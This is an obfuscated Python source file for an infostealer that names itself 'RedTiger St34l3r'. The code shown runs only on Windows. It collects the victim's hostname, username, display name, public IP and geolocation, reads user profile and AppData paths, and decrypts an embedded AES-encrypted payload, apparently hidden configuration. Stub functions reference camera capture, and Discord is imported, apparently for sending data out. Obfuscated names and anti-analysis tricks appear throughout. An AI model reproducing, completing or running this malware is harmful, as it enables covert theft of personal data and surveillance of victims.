
import sys

def FURQYVAFNNPMNQDNKMWZYTZPOWELJAKJBRMPOJZECZEPZYFXXIASKVBWXCOYGSUYLAPIOIHREZENSXPRIP():
    def WULRPRDJKMJDXULZRZMZBHPZXJFHCIDOUDXRCOGJGBDDJHDMERIPVLVLLMQYBGRIVZB():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI = WULRPRDJKMJDXULZRZMZBHPZXJFHCIDOUDXRCOGJGBDDJHDMERIPVLVLLMQYBGRIVZB()
        if UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI == True:
            return UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI
    except:
        return True
    
if FURQYVAFNNPMNQDNKMWZYTZPOWELJAKJBRMPOJZECZEPZYFXXIASKVBWXCOYGSUYLAPIOIHREZENSXPRIP() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def CIYGETXKSQCFISENIGJWZHBDMFRAOMVYBLUENZWKVARNSVWUMJQJXFMLHTJHISZPOEVVGNMVETZSDIC(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA): 
    UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info = None
    return UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info

def APIFUMSGYFOQDZEGEHAJGBDABRMZPKWRQBSRGADEGWHNJJTALJNLPIQPJQPJVXXNPZZDRLLGTNTJQXSMXKGJKAFL(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA):
    CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ = None
    return CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ

def UJRMKBIPSOBATIAYJHPZTJUFESHZLPBTGAVYIKQYEDBBKADEPJNUTZIWFFCDPQSLQFPKQIIKOSRZDWIMSYPANCR(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA):
    BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX = None
    return BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX

def TTIYQXBAQRPECTMBPWQDDIIUCUQYQCHSQINPQVIDCIATRDUKQZATOTGECWFPYGNWCMGJVSB(): 
    RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX = None
    return RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX

def FZUURBXWWVONHRCLMTULJNASKTBJWPVHQNCZBKVRHAVCZDBXLMKEWJAZPMJIRMSHRGLLIAYAPYSMILSLPKTUMXHO(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA): 
    XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH = None
    CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR = None
    BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM = None
    AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ = None
    RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA = None
    SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD = None
    return XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH, CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR, BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM, AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ, RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA, SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD

def AGONIBWTJYWDEUJSRSCGNEVVDAQKHIVJFUOGZKMKVSMYRAGNHCEWJPVYGNBKKRUPWMMRQRTFDZNX(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA):
    DZXIPELLEKBGHLZEDQJWAKOJWGQALIIUQAQSLWMOUXSYAYHCKYTSSEQK = None
    FUGRFVAVPZATEUYAVWRPPAQZPZAXWKAGHOSXJFGGKEWKLTKQTCIKMJJZSXZVXBJVEYASHWVOTZPDOKNOVGXTTFQD = None
    FSHTQTZOAUXMZYNAUIKYXBMFCWEDAGOCLSMURSVJERCSOGRWFDRA = None
    return DZXIPELLEKBGHLZEDQJWAKOJWGQALIIUQAQSLWMOUXSYAYHCKYTSSEQK, FUGRFVAVPZATEUYAVWRPPAQZPZAXWKAGHOSXJFGGKEWKLTKQTCIKMJJZSXZVXBJVEYASHWVOTZPDOKNOVGXTTFQD, FSHTQTZOAUXMZYNAUIKYXBMFCWEDAGOCLSMURSVJERCSOGRWFDRA

def RUFNUMUBBSKTMJRZCMPHEJZEZINJAGUFNJWGBXRPWUNTBGOWMFQGBFRWGKGWSNGPHCWHAKRNSYCZKEWKQ(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA):
    YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS = None
    return YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS

def NXNOEVDYIZUWFDZIROKWCNHLTJQLFMTSHDRGEZMEDLJDEFRBJIBGQRZNWGOGIYUNKANZJXYGECM(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA):
    UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture = None
    return UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture

def RELJDWSWCFJHNVECVUWKTCFMRZNDQGDLFZSLXSKEKXFJEHIEGGDG(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA): 
    NYSJEHAFOSYYIOAPIVHSJVPNHCUNTETWANMWOVOROTVTUIFPTUGZRNKENSDRSCDQSOCZEKVCZEVGCKQXJZGNSRJIE = None
    return NYSJEHAFOSYYIOAPIVHSJVPNHCUNTETWANMWOVOROTVTUIFPTUGZRNKENSDRSCDQSOCZEKVCZEVGCKQXJZGNSRJIE

def EQLXNYMYBOZYSASEBOWZUEPPGNDGVADWBXBUIJQMOQSODSKDSNATTXMOMKTZSKVLCOMYQBOXLNYUWWUWGKMVMZIGDGOU(): pass
def FHOUPTASJZAXJFYEQTJVSIOURXIRCWDXMPJXRTSWYJOKQODZGFVLTLSCYSWTIDTZQROGBBPRHDCFYIPIUNSDWAAJKS(): pass
def AGYGINDSWFGRIAQHZUFKYUFLVQYJENWIJIWODARXKCVEUMGKFVIJBUFVSSJIVPYYNXQEAJKCTNCHJXNZKFYZCXD(): pass
def TUSGPBOXTKVPSQAHRTIHXZQPXHHHZGOXUHFMAOBQIKKCSUSTDAMGJSXDKBWISFXTHQTLXWQGMVAQWXSGHKWCGTMXAHT(): pass
def ZRWTKBHSEYNDBJGDTKKHZMYVFQHWZWHYFSAZZCDIYHMBSEKFIGIHIYWVUVPWHJYLANDVCGYWXEFXDZFQ(): pass
def XBDXHDBKJMWDXPGCOUREANMWZFDYCRNKWRCQJFRSZKKDLACLLRMEMIFFOAUHKWVWXCNZSVESGUYSHWMDKDLMLXQJX(): pass
def LWPPVYMNZCPFTZAODDRKNVRLTWDPLTEFMASBLXQNQMOHDJJRWPTJVFJDGWLPLSTNZZWSXBAUYDZLQQCFYGWRVE(): pass
def HDNFOOORSWUSXLSFWDCACLWFPTXWCIMWKDEJWTPNQMVZKBKSVYYPIZVYTELHCNKQRAQLXANICQCCTKZVCXBNNJZFBB(): pass
def QTAILXBPCFEZYYRUJUBUGJAITHXOJGRWQAWEAIFPNKJYAVKMASSIUEJYMXCAEWPQSLFWGXXSWZUEOEJW(): pass
def PGXHUOHZGTXBQJWMQOUQLWSYTRMOFVTPIFDHQWOKVPXGYBOQYNRONZJRT(): pass
def SXVHDQXTNTYFNSJDKLYWUGHNXKKVWZTCSKEMRIVADKDZBIEZEBAUUGCDUVHJSMNENWRUCLTCALNCQQQZYMYALXPNC(): pass
def VCPTNHNUTCCBTWYELXRTPTHRQHRZQLCAFBNZJAVXERFZKYEXTTGKEX(): pass

def VNMWRIBNYYGFPXTNEBYLRFZOLWCEGZTQWOJQQNLFMSHEQTLJLVKEJQBUAADBQDXP(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def AUJIPUTXJWQXDLJIEOPKKPKGBVKGWQRIOKAZFCERWTXYCCXOPVMQXTFWCKWAQKH():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def NTAXWNILMONHYOPRDIDYFLZRLBHDWYWYERGEJOMSHAEERZAZZIHXMVZIYKWDVCLBWOWWXOUPPJB(EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX, FFDDFGFDMKXLDNIZNVPKLNHTPIFMYYPHVJVSKXCWVLHKJAROOIYDLRVJHBXQTROHOMXN):
    def ZNCXTBGWDXKVXMXXQUTAOCPNZHGEZZKLONZSOVIYCHEQRJZOUYIAZDRKQEKKTHIDCEQTPSKOMSYNNMMGKWMTLNZG(SWSZLWEHGJGLFDRDYGLQKQHUUIQLHBAFTSDOZRLXBTTCVOXMOZZTINZTHFUNTDLENQPDWGUGHCVN, XADNVVDTJCQOPHJHEFCMGZQLTVUGTOQHLAKRPCHJYEAIJTERCVRMVKQIMOQF):
        EJTIWRNQWCJJVHBIJPFXVFFPSOQJUCQZMZDVMIRJMTBKZFXGUYG = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=XADNVVDTJCQOPHJHEFCMGZQLTVUGTOQHLAKRPCHJYEAIJTERCVRMVKQIMOQF, iterations=100000, backend=default_backend())
        if isinstance(SWSZLWEHGJGLFDRDYGLQKQHUUIQLHBAFTSDOZRLXBTTCVOXMOZZTINZTHFUNTDLENQPDWGUGHCVN, str):  
            SWSZLWEHGJGLFDRDYGLQKQHUUIQLHBAFTSDOZRLXBTTCVOXMOZZTINZTHFUNTDLENQPDWGUGHCVN = SWSZLWEHGJGLFDRDYGLQKQHUUIQLHBAFTSDOZRLXBTTCVOXMOZZTINZTHFUNTDLENQPDWGUGHCVN.encode()  
        return EJTIWRNQWCJJVHBIJPFXVFFPSOQJUCQZMZDVMIRJMTBKZFXGUYG.derive(SWSZLWEHGJGLFDRDYGLQKQHUUIQLHBAFTSDOZRLXBTTCVOXMOZZTINZTHFUNTDLENQPDWGUGHCVN)

    EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data = base64.b64decode(EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX)
    XADNVVDTJCQOPHJHEFCMGZQLTVUGTOQHLAKRPCHJYEAIJTERCVRMVKQIMOQF = EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data[:16]
    ZFUNJMBGCGNCDRRWRJPVJHHMSURKEJZKNUJGLZJPURMXUKWMHCFI = EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data[16:32]
    EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data = EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data[32:]
    XHOGERYTXEUJESKLYAZOJSNGNQUMRBYGZGOSTYTWBLTZPGFGECCXIRQBQXFPKVZFTMIQMTAJAGYJSRUSYOXUVEFFKNBVDPIRHOBY = ZNCXTBGWDXKVXMXXQUTAOCPNZHGEZZKLONZSOVIYCHEQRJZOUYIAZDRKQEKKTHIDCEQTPSKOMSYNNMMGKWMTLNZG(FFDDFGFDMKXLDNIZNVPKLNHTPIFMYYPHVJVSKXCWVLHKJAROOIYDLRVJHBXQTROHOMXN, XADNVVDTJCQOPHJHEFCMGZQLTVUGTOQHLAKRPCHJYEAIJTERCVRMVKQIMOQF)
    UMYCWQZWZUFIMPQTUVRAVFXRDJVOYTWSQYRQUMGPOLHQUCPSZVEJGHSLVTOQQJKDWJHAHNMHWVZNEVBTM = Cipher(algorithms.AES(XHOGERYTXEUJESKLYAZOJSNGNQUMRBYGZGOSTYTWBLTZPGFGECCXIRQBQXFPKVZFTMIQMTAJAGYJSRUSYOXUVEFFKNBVDPIRHOBY), modes.CBC(ZFUNJMBGCGNCDRRWRJPVJHHMSURKEJZKNUJGLZJPURMXUKWMHCFI), backend=default_backend())
    KMHNODSLNWHBHUPQCKQFVCKUDRVXRFTKSYMGBDIBCRQXSBJWRFCWWEDDXYVSKWXSGAEFCOXWLCCSAZIUVQED = UMYCWQZWZUFIMPQTUVRAVFXRDJVOYTWSQYRQUMGPOLHQUCPSZVEJGHSLVTOQQJKDWJHAHNMHWVZNEVBTM.decryptor()
    YJKZSOSFSVZWGSGWUPHIQONKECPARGNFPDZBZHTKCCSNDNYRLQIWGBBSZTTVWHBDEDAVUCNZLSUZZTGMZGCYDMHYEHQEZKCKG = KMHNODSLNWHBHUPQCKQFVCKUDRVXRFTKSYMGBDIBCRQXSBJWRFCWWEDDXYVSKWXSGAEFCOXWLCCSAZIUVQED.update(EXMJMUKROAWQCWFHEPJFTUPWJIBLNJXMEPMYYBRNZLBWJCGKYPHLWPDKCQUIEWSYIKRAMIGX_data) + KMHNODSLNWHBHUPQCKQFVCKUDRVXRFTKSYMGBDIBCRQXSBJWRFCWWEDDXYVSKWXSGAEFCOXWLCCSAZIUVQED.finalize()
    RMADETIOITQXRTSGMVZEKXAQINMDSSXKGYJAWLPBKIWDFTUPRUQRXQPT = padding.PKCS7(128).unpadder()
    MHBRCRIUPEONYLBVGGQGPDMUXDFIXJVBKCDNPRYXCWMJFYHYRBAVZWUHVLSVQQHGWBXMPODKUJ = RMADETIOITQXRTSGMVZEKXAQINMDSSXKGYJAWLPBKIWDFTUPRUQRXQPT.update(YJKZSOSFSVZWGSGWUPHIQONKECPARGNFPDZBZHTKCCSNDNYRLQIWGBBSZTTVWHBDEDAVUCNZLSUZZTGMZGCYDMHYEHQEZKCKG) + RMADETIOITQXRTSGMVZEKXAQINMDSSXKGYJAWLPBKIWDFTUPRUQRXQPT.finalize()
    return MHBRCRIUPEONYLBVGGQGPDMUXDFIXJVBKCDNPRYXCWMJFYHYRBAVZWUHVLSVQQHGWBXMPODKUJ.decode()

VNMWRIBNYYGFPXTNEBYLRFZOLWCEGZTQWOJQQNLFMSHEQTLJLVKEJQBUAADBQDXP("")

try: KOBROTBTXPQLQPIVOCEONWRZYSHHUVBJVEZASSGEZIXCFGIJSDAOLQWPVRACYVR    = socket.gethostname()
except: KOBROTBTXPQLQPIVOCEONWRZYSHHUVBJVEZASSGEZIXCFGIJSDAOLQWPVRACYVR = "None"

try: HCXOEUISVQLUBHHTLIYZIEMKRYSHOJDRKMNBWJKKNCLLVPDAAGWPBQYXJGXX    = os.getlogin()
except: HCXOEUISVQLUBHHTLIYZIEMKRYSHOJDRKMNBWJKKNCLLVPDAAGWPBQYXJGXX = "None"

try: OQXWZRQJJXWZECYFWCVXKEGHYNRGQXZOORFGIEXBYZOKZHGWSVFJZ    = win32api.GetUserNameEx(win32api.NameDisplay)
except: OQXWZRQJJXWZECYFWCVXKEGHYNRGQXZOORFGIEXBYZOKZHGWSVFJZ = "None"

try: BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK = "None"

try: PDIYUEWRWSVPKNVJLLSWYKPFFHJKWQHEZOCLYQGCOHFUIQCEIIBTTHPQGEWWGDSBZRNQZSWGHSG    = socket.gethostbyname(socket.gethostname())
except: PDIYUEWRWSVPKNVJLLSWYKPFFHJKWQHEZOCLYQGCOHFUIQCEIIBTTHPQGEWWGDSBZRNQZSWGHSG = "None"

QFZKPMUVATFQPYXIWSAMPDGJNGZMNKQXZYEMKFAZBWQHLHYDOZESCLUKKWUALSNACH = r"""
OOGcqWY0+oSmXK5RYR/jAAot3Nd6lmHSmz6W8aMBK8FwEXrON7f57RN/RPygZVu9mj8lpGjzmRv1sLkljMZo2VqVG7oyLPWDEytraXtjG1Ux1Dv14ETGC2OPTpdZJIiVXDTlyOzmDJgjBp6c5ImgFA5e7XZepWTM9n/PK6qqmi5ASKbR7XYMLjYt4iWSrBP+46cXxdXmjDmFeLRPz4zwMQ==
"""

QVMABENHJJORKFAMBWLPHPSETMWWWELNQLXSIMZRSMGNWVHNSAONSQGHUZEWHASREWZ            = "oPNCzwmWnwExjwPslkHFbfyiYPxiOMyeoxFIPDsvxbaTRDbUIpxkJOJHsFKouGkNxVhifXPpWSpzHAOeRyIediwczJtjqAzEAIbBiHoLihtndUdhViTHsSeKmyBpHiZRaZbxxmz"
UKNVRAZDKTHCHWOWDJFFPQFVONTXWHRSXVDBARCOGFUIBZCYBUBRRUJJUSKJJEUIQRUECAMUPFLEQPTLZPII        = "None"
GETKJPXQUYRGOSAKJOWQKVPYTCDLHFEHVTFUGIOOSECGCJCPEEAFFYLNQECIXIVGMLCOZDC    = 0xa80505
IMUIIKUYHZKTSQOJEQOYSKVFELKSRJDNQLWNDQXXBJUOCPMVGGCHAFSLTHUUF = "RedTiger St34l3r"
GZYSMIFLQTDYZPWBFOFONYVQAITOEEGDCWJSAMSVYCVVCLFFWRVKHTYQYCXGEFDMREANHMK   = "https://google.com"
BXQTAOXHUPLINPWSTIWHNJMUZLRKYHVIGTANSZGWMKRXPEJKKZNX    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
KEICVGSZCNDSRDKEBDSGFKMFFPDVLRNHNJSPQQDVUIFUIVAYBEYRDQQERVTTGMJCHMLWP   = {"text": BXQTAOXHUPLINPWSTIWHNJMUZLRKYHVIGTANSZGWMKRXPEJKKZNX, "icon_url": GZYSMIFLQTDYZPWBFOFONYVQAITOEEGDCWJSAMSVYCVVCLFFWRVKHTYQYCXGEFDMREANHMK}
SGOIYTEGBSADMBWWLFWWRURWFZIJZWGBTNOAUEMGFJWOQUXNXDDKHLZXISKUANJVGMVUZVQSATK    = f'`{HCXOEUISVQLUBHHTLIYZIEMKRYSHOJDRKMNBWJKKNCLLVPDAAGWPBQYXJGXX} "{BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK}"`'
NHPAKRKKRLRTIQBORZILQGXGWDYXVZSUVAYCUOLQGAMDVJJPMVGCWKBEDEHPDGRXXXFJDXZLNYSDHMM    = NTAXWNILMONHYOPRDIDYFLZRLBHDWYWYERGEJOMSHAEERZAZZIHXMVZIYKWDVCLBWOWWXOUPPJB(QFZKPMUVATFQPYXIWSAMPDGJNGZMNKQXZYEMKFAZBWQHLHYDOZESCLUKKWUALSNACH, QVMABENHJJORKFAMBWLPHPSETMWWWELNQLXSIMZRSMGNWVHNSAONSQGHUZEWHASREWZ)

UJDQUUTRCMPMTUDTUEILAJWGJBAMKOQFGZWBJCOUZJTMOJKUGLYH           = os.getenv("WINDIR", None)
JZZHEKDFFMJPHWXIVJBMUFDEPFNNSYXPLDEMPYRCBBLPGLCERHZMUCWHEECOOMVMNLPPRSKUDDYH       = os.getenv('USERPROFILE', None)
EHSYIIPQBSJAOTZZLXJOJWKBMMJYJHWNYWJILDFTNAXHKHKLKD     = os.getenv('LOCALAPPDATA', None)
TYVXWCXWMTSUQOUNWJFXLPDADDSSTSVKMBNRVXEOHYQXFPHTUZBMJMISJHD   = os.getenv('APPDATA', None)
ZCLBZFWKDLTSKKABLEBARNPOZWRTARRLLGHJSTZXDMVGOEDMCWFTWAVRDJXXDPMOFTIERCKVRQ = os.getenv('ProgramFiles(x86)', None)
if ZCLBZFWKDLTSKKABLEBARNPOZWRTARRLLGHJSTZXDMVGOEDMCWFTWAVRDJXXDPMOFTIERCKVRQ is None:
    ZCLBZFWKDLTSKKABLEBARNPOZWRTARRLLGHJSTZXDMVGOEDMCWFTWAVRDJXXDPMOFTIERCKVRQ = os.getenv('ProgramFiles', None)

try:
    XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX = requests.get(f"https://{UKNVRAZDKTHCHWOWDJFFPQFVONTXWHRSXVDBARCOGFUIBZCYBUBRRUJJUSKJJEUIQRUECAMUPFLEQPTLZPII}/api/ip/ip={BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK}")
    XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN = XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX.json()

    PPCWEAJSOSQTZIELSAPPFBXSHCCPZMQQYDYRBDQKAXVUZBZRZEYDGCJZBSQBCTXLTVRTVUOYDUYZUAXBGIDMWUWQXOWFRULLZU = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('country', "None")
    PPCWEAJSOSQTZIELSAPPFBXSHCCPZMQQYDYRBDQKAXVUZBZRZEYDGCJZBSQBCTXLTVRTVUOYDUYZUAXBGIDMWUWQXOWFRULLZU_code = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('country_code', "None")
    NHOWVKVWSIAQSFMFXEBMLLGBMRXRBYLREEVADTHRBXLYUAMHTJFHQEFDXVOMNLHVNCQCXTHQHLBYUCMTIASGOGGAJ = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('region', "None")
    NHOWVKVWSIAQSFMFXEBMLLGBMRXRBYLREEVADTHRBXLYUAMHTJFHQEFDXVOMNLHVNCQCXTHQHLBYUCMTIASGOGGAJ_code = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('region_code', "None")
    RSZFQZGMVXPSPGPCUYISOQUFXUKGPRAYMWRQTNEWBHHAGYWQVWEGQBWVCFEYWKQLMGAZPJ = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('zip', "None")
    XFHRQNOPGIWIQEOPJTUKVQGLOUNPKHARVYDLGXTHMSPWFMNSQLBOLUBNFJMMITSLH = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('city', "None")
    BHBZUFAHVVPXTEVEGZJELPHIEBMVFWDUAXEGULFQBEIBAKTQECHBPJWPZZYLNBDAECEYLGMZFXPLMEJPGUEXT = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('latitude', "None")
    BIRZLBIEOSXTGSLEAYXCITZHVZWTSKLKUKQWVTGRQHRFHYUWAJMPWZUUSMCTCWYJCZVEOCRDHRXWXRTHTOBHTFLI = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('longitude', "None")
    CLYALTZVQNRARRVZJOHMLTVJHEZTACOPOGRZSUJLLZWFAANLLTPFOCPYWG = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('timezone', "None")
    KBOIRLMLZCZYQCIZLUEJPUKOGKVJSJPJBFZUFOENCMJMQXNRTBKAMQD = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('isp', "None")
    WWFPRKGRRGQLCPCDHVGYJMQPFJEUPXVPBXAITIFVMFYLVCJHEHHF = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('org', "None")
    LAZEWTGJNQBAYWHOKLHFZDUZRBBREMPZYDGYVTBWBIAJJDPAFTEFDTHMJWUGFKYLRWYXTGXQLYMOUYBJWFEFQUM = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('as', "None")
except:
    XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX = requests.get(f"http://ip-api.com/json/{BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK}")
    XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN = XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX.json()

    PPCWEAJSOSQTZIELSAPPFBXSHCCPZMQQYDYRBDQKAXVUZBZRZEYDGCJZBSQBCTXLTVRTVUOYDUYZUAXBGIDMWUWQXOWFRULLZU = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('country', "None")
